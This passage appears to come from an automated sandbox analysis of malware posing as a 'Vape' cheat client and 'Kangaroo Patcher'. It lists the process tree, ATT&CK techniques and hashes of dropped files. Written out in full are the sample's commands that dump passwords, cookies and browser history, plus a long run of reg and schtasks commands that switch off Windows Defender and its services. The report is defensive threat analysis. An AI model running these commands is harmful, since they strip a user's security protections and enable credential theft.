- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4544 -s 756
3⤵
- Program crash
PID:2192

C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe
"C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Modifies registry class
PID:2304

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs5VFtFw8GPl2o609DwannDWjbX//ceZhrgRtFEQlPeuBDPo7S8RxCmJq1oNyZNIOFAbAJDtv39aT7L66WiS9yoY6W2NZNSZEiqw5JFw3ahq7Vz00F2OsAdryW0zYwpqnzc=
3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
- Checks computer location settings
PID:2784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
PID:3052

C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
6⤵
- Executes dropped EXE
PID:956

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
- Checks computer location settings
PID:1884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
PID:892

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1016

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
- Checks computer location settings
PID:4476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
PID:3140

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
6⤵
- Executes dropped EXE
PID:4176

C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
6⤵
- Executes dropped EXE
PID:1616

C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1472

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
- Checks computer location settings
PID:1584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\xwizard.exe
C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
3⤵
PID:1420

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:4984

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:1172

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:2884

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:3440

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3712

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4260

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3772

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4204

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1756

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:2320

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
4⤵
PID:4676

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:4560

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:5004

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:1444

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:3028

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:4188

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:4264

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:3808

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:1800

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:5116

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:4212

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:4012

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:492

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3740

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3356

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4128

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2468

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4104

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 1720
3⤵
- Program crash
PID:3780

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 204 -p 4544 -ip 4544
1⤵
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2304 -ip 2304
1⤵
PID:3980

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies
Filesize
20KB

MD5
7ec63de3be6cb913dffe27ee64ae7361

SHA1
34edca08d34daebd447e914de3e2165647114558

SHA256
1992ca2a52984ee644d316dca9be873c0533bd54809696ec163fda85b26288e9

SHA512
bf6c7d454e60479a807456fa934b1aee5543a99b62e4a39a5271917d73745bfa948bd5c6438dd4c9d61ef485d953c24e2d8ba0323819efdd0797f8275b21fee3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
Filesize
116KB

MD5
81c957eabea23bd6b9303f21f3577e94

SHA1
bdb30e110adc559a433ad5483513ee2f1f7ee083

SHA256
61ad50136c2b9ff127b152d2ac57a672ee6f2aa9cab2cf78f7394d76a9dcfada

SHA512
48e8f8b8fbdcc0ca80677f3ade91f60d9f7de5558ff9cb7de9e2d9b03f10167ea75d5e85b01f2c7515f983285f6054094399dd1574959fe2b2762dbc2c2e2bc8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
88KB

MD5
c2fa1ea47f082ce4510165951b1a0bb7

SHA1
dfc4ff20f36bad054c6748fbc39c99f6b9ab4a8d

SHA256
beaf8f550f249c7d4310ce2e18b883ef406ac8dd834d787dc3f77acd40337b3f

SHA512
9dee7f62bc1aaaf1af004ccf19140685632a4c780bfd00b76007fc4a10c7460e803847ffdbe9de7583e3b69f8c2a284a737932fc3906c4eaa93cedce74ddffe1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO8251D1B8\Vape_v4.08.exe
Filesize
7.6MB

MD5
7407fd99ee1940051b4f543656ea9b0a

SHA1
7149b25db501b75111ac77fe4bcfe6915058757a

SHA256
bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd

SHA512
804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO8251D1B8\Vape_v4.08.exe
Filesize
7.6MB

MD5
7407fd99ee1940051b4f543656ea9b0a

SHA1
7149b25db501b75111ac77fe4bcfe6915058757a

SHA256
bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd

SHA512
804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe
Filesize
4.6MB

MD5
1f759cd41e647fce566d60749bf7e0ab

SHA1
5120d55459ccc731f0a80706801a3779dc871178

SHA256
bf5ec385d397154f22d2383cb6d33d206fafde02313607bf565e39dce858653f

SHA512
72153e3acf7185b755fa69384c3d431cc20ab0dd91fd48d6f4c4f5bc8f110d4e89ae8c3ba2b780c870e2cff1bb51949ff9046758883b12f2656a3ad34185850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe
Filesize
4.6MB

MD5
1f759cd41e647fce566d60749bf7e0ab

SHA1
5120d55459ccc731f0a80706801a3779dc871178

SHA256
bf5ec385d397154f22d2383cb6d33d206fafde02313607bf565e39dce858653f

SHA512
72153e3acf7185b755fa69384c3d431cc20ab0dd91fd48d6f4c4f5bc8f110d4e89ae8c3ba2b780c870e2cff1bb51949ff9046758883b12f2656a3ad34185850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_History.txt
Filesize
2KB

MD5
c1151df0dc6e21f1f5ec8c93756d07f2

SHA1
8d496c385c161ce822087b5fefb90461c7890eb8

SHA256
eec798b2fcfdf6d28538049f911f05e928b854f5ffa517119c9e8c5c65495ae5

SHA512
fd4d67bb8f7fbfb611d944853f9e22b3fe6ff78a9abe3d58b7ac731e1aca58a4049c3ed05a74924a9e24dd6756bb5ac0e7c7a504489256fed3f5cbe7740df142

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
Filesize
4KB

MD5
e64c42bc217d551e4168a94182323359

SHA1
76937b2d460a61e91393dc198b277c4171b11fd8

SHA256
9bf4040d8495d226d2fa94cc117181a753d36197a944e73c9f02186bc3d93454

SHA512
c1ff859dcd080e7c77a594c81b9e3068ac899db2b7ccb2c3672e988f5a616b292bc7feaabcd4d4966c41fa28584a5458be60cd7edc661d2d4f9de0520b5f52c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cookies1
Filesize
732B

MD5
766ce0020773e99d019d1a3279a37ca9

SHA1
c7e6e3fca1323f2064b222b708e9246233288bd3

SHA256
bcba2d8951556a296ae9f76d148fb1dd6819698b2b0fec07bbe094b1d4b7848d

SHA512
8c8bb0f1ef0153c5eb60ce34431a00a8a675c43ad5ad9f5b9cd81bad816c7ec4391a70d1de554743a2b24efbcbe50503f955ee880d54642d262cf45a4d3bb204

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cookies3
Filesize
11KB

MD5
7c5cb0f4592b6155203eabbe50307698

SHA1
bf7354b917d5828b36ff5c207ee01f2cccbf29cb

SHA256
daa0607f32b029afd0d3c4f7163a18d3a572eded6b484f9c37b717125c5623b1

SHA512
f5158f415b4a491e6cc19d5eb277de452990e3d4bf10450da9c72feae6c3776e1a27157b7f756c8a368dd9690817e9e6d14ef7bb6fb35fc548fc11e25e9dab1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\bfsvc.cfg
Filesize
420B

MD5
51c9e864182413f35b76d42d435df261

SHA1
dc5ec227ab38093927a119b4d646c3811c3553cd

SHA256
e6c5c674268a865db840afd3764cd498bdfd8fe677c5193d662abbe64d68975b

SHA512
b36e683b6487bfbf4e512214343128e57a52eb71356345caba70a98dc5b0bad764da842d08443d3b47bd3dddbe24af146c561ae480038c95f124a51565e3fd99

Download Submit
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
Filesize
71KB

MD5
899d3ed011eb58459b8a4fc2b81f0924

SHA1
80361f1e0b93143ec1ddfee156760f5938c85791

SHA256
5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

SHA512
802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

Download Submit
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
Filesize
71KB

MD5
899d3ed011eb58459b8a4fc2b81f0924

SHA1
80361f1e0b93143ec1ddfee156760f5938c85791

SHA256
5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

SHA512
802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
70B

MD5
d90accebb3f79fe65cd938425c07b0ae

SHA1
9df3812a88d87dd419cd9e89afa5fb1d71be0dc9

SHA256
aca74cefaef4b7a32338c9c63187cffa1e808b54ab218a064007683ad1bd3a0e

SHA512
44013bfda1dbe5b217d4872e8d550cd00471cb8b969ffd6b07f83b0c59ac20ec2512d275a4603cc00e5de3a04666f66e897601ba51a5e02af622e5139ac04560

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
74B

MD5
808099bfbd62ec04f0ed44959bbc6160

SHA1
f4b6853d958c2c4416f6e4a5be8a11d86f64c023

SHA256
f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8

SHA512
e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
156B

MD5
eb51755b637423154d1341c6ee505f50

SHA1
d71d27e283b26e75e58c0d02f91d91a2e914c959

SHA256
db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

SHA512
e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
71B

MD5
91128da441ad667b8c54ebeadeca7525

SHA1
24b5c77fb68db64cba27c338e4373a455111a8cc

SHA256
50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873

SHA512
bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
Filesize
265B

MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
Filesize
265B

MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
Filesize
265B

MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
Filesize
265B

MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\config
Filesize
106B

MD5
519c6696def8e6c2cd0b5ababb4e169c

SHA1
70fefa208ee058d643a33570274fd9915dabc02d

SHA256
8f5ee072732db50232fbe6f6f288ed9ebb4962c612c3ed964319d1d9cb460895

SHA512
673eda4dd69bb2f4031bb3657c53f5471144f7177f799badef5343573bc7a803c55bac0100244f73977b4ae093f575de2e651779af57cab1ea3e2e58c13bb39a

Download Submit
C:\Users\Admin\AppData\Local\Temp\dav.bat
Filesize
3KB

MD5
fc3c88c2080884d6c995d48e172fbc4f

SHA1
cb1dcc479ad2533f390786b0480f66296b847ad3

SHA256
1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664

SHA512
4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\hh.exe
Filesize
103KB

MD5
4d4c98eca32b14aeb074db34cd0881e4

SHA1
92f213d609bba05d41d6941652a88c44936663a4

SHA256
4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

SHA512
959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

Download Submit
C:\Users\Admin\AppData\Local\Temp\hh.exe
Filesize
103KB

MD5
4d4c98eca32b14aeb074db34cd0881e4

SHA1
92f213d609bba05d41d6941652a88c44936663a4

SHA256
4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

SHA512
959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

Download Submit
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
Filesize
391KB

MD5
053778713819beab3df309df472787cd

SHA1
99c7b5827df89b4fafc2b565abed97c58a3c65b8

SHA256
f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

SHA512
35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
Filesize
391KB

MD5
053778713819beab3df309df472787cd

SHA1
99c7b5827df89b4fafc2b565abed97c58a3c65b8

SHA256
f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

SHA512
35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
Filesize
49KB

MD5
0d8360781e488e250587a17fbefa646c

SHA1
29bc9b438efd70defa8fc45a6f8ee524143f6d04

SHA256
ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

SHA512
940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

Download Submit
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
Filesize
49KB

MD5
0d8360781e488e250587a17fbefa646c

SHA1
29bc9b438efd70defa8fc45a6f8ee524143f6d04

SHA256
ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

SHA512
940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

Download Submit
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
Filesize
184KB

MD5
a776e68f497c996788b406a3dc5089eb

SHA1
45bf5e512752389fe71f20b64aa344f6ca0cad50

SHA256
071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

SHA512
02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

Download Submit
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
Filesize
184KB

MD5
a776e68f497c996788b406a3dc5089eb

SHA1
45bf5e512752389fe71f20b64aa344f6ca0cad50

SHA256
071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

SHA512
02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwizard.cfg
Filesize
1KB

MD5
ae8eed5a6b1470aec0e7fece8b0669ef

SHA1
ca0e896f90c38f3a8bc679ea14c808726d8ef730

SHA256
3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e

SHA512
e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
Filesize
544KB

MD5
df991217f1cfadd9acfa56f878da5ee7

SHA1
0b03b34cfb2985a840db279778ca828e69813116

SHA256
deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

SHA512
175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
Filesize
544KB

MD5
df991217f1cfadd9acfa56f878da5ee7

SHA1
0b03b34cfb2985a840db279778ca828e69813116

SHA256
deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

SHA512
175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

Download Submit
C:\Users\Admin\Downloads\Vape_v4.08.rar
Filesize
16.0MB

MD5
72d665e58b17ff50b056e205fb9a9504

SHA1
ee644927d78fd48543939cf3d871d3bbcfbf779b

SHA256
f1a8f64ca660c8978443cbaf5119050730aca0954f60e7ef0a2a9ff2c24fa119

SHA512
d95d3ea4932090423564d98706fa4877fc53b746e09cc4b799b65b12fb4ec0bd3c98a2bf49e59f510bf9635a253870f0bfad737a00c8e6dac794247dbc603015

Download Submit
\??\pipe\crashpad_1636_EYWMEYKFCENKXHBT
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/492-178-0x0000000000000000-mapping.dmp

Download
memory/892-205-0x0000000000000000-mapping.dmp

Download
memory/956-199-0x0000000000000000-mapping.dmp

Download
memory/1016-207-0x0000000000000000-mapping.dmp

Download
memory/1172-156-0x0000000000000000-mapping.dmp

Download
memory/1420-152-0x0000000000000000-mapping.dmp

Download
memory/1444-168-0x0000000000000000-mapping.dmp

Download
